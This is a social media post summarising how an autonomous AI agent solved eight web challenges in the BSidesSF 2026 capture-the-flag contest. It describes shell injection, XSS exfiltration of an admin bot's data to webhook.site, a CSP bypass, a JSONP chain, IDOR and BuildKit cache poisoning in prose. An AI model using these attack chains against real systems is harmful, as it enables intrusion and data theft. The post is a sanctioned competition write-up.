I saw BSidesSF CTF 2026 challenges go live and thought can my AI hunting agent solve them? The CTF had 57 challenges across multiple categories (crypto, reversing, forensics, pwn, etc.) but I focused on the 8 web application challenges only.
8/8 solved Autonomous No Kali, no Docker just running on my Windows 11 machine with curl, Python, interactsh and
webhook.site for blind issues
Below is the summary generated from the agent:
1. gitfab (Shell Injection)
Agent fuzzed every ASCII character through the filter to build a complete map
of what's stripped vs preserved. Then chained "
(newline) — two characters
the filter missed. Confirmed RCE with sleep 3 timing (3.62s vs 0.4s baseline)
before reading the flag.
2. web-tutorial-1 (Stored XSS)
Created a
webhook.site endpoint for OOB exfil. Injected a script that fetches
/xss-one-flag from the admin's session and sends the response to
webhook.site.
Admin bot executed the payload and exfiltrated the flag. Done.
3. web-tutorial-2 (CSP Bypass)
Noticed CSP uses nonces but missing base-uri directive. Found a nonced
<script src="test.js"> using a relative path. Injected <base> tag pointing to
webhook.site — browser loaded test.js from attacker server while the nonce
still validated. Hosted the exfil JS on
webhook.site.
4. three-questions-1 (Game Logic)
No exploit. The agent tried SQLi, SSTI, IDOR — all failed. Then it just played
the game legitimately — built a decision tree from 6 yes/no questions, asked 3
strategic ones, deduced the musical character. Won fair and square.
5. three-questions-2 (Info Disclosure)
Found <!-- debug endpoints: /debug/game-state?... --> buried in HTML comments.
Called the debug endpoint to leak the assigned character name. Guessed correctly.
Done.
6. three-questions-3 (IDOR)
Debug endpoint now needs a user_id param. Agent decoded the Flask session cookie
(base64 → JSON → _user_id field), extracted the internal numeric ID, used it
for IDOR on the debug endpoint. Cookie crumbs led the way.
7. three-questions-4 (JSONP XSS Chain)
Triple chain exploit. Found /characters.js?callback=X — unsanitized JSONP.
CSP is script-src 'self' but JSONP is same-origin so it bypasses CSP. Sent
admin a message containing a script tag pointing to the JSONP endpoint with
an exfil callback. Admin bot executed it, exfiltrated character list via
interactsh. Used debug endpoint character list to win.
8. builds-as-a-service (BuildKit Cache Poisoning)
The boss. Agent solved 28-bit hashcash PoW through a web terminal (ttyd).
When Python was too slow, it wrote a C hashcash miner, compiled with GCC -O3,
debugged its own SHA-1 implementation, and fixed it. Then: installed buildctl
inside a Docker build, queried the BuildKit gRPC API on localhost:1234,
extracted the BUILD_VERSION from cached layers, reconstructed the flag
Dockerfile with a dummy secret, triggered a cache hit (BuildKit doesn't
include secret content in cache keys), and exported the cached image containing the real flag.
#Bugbounty #ai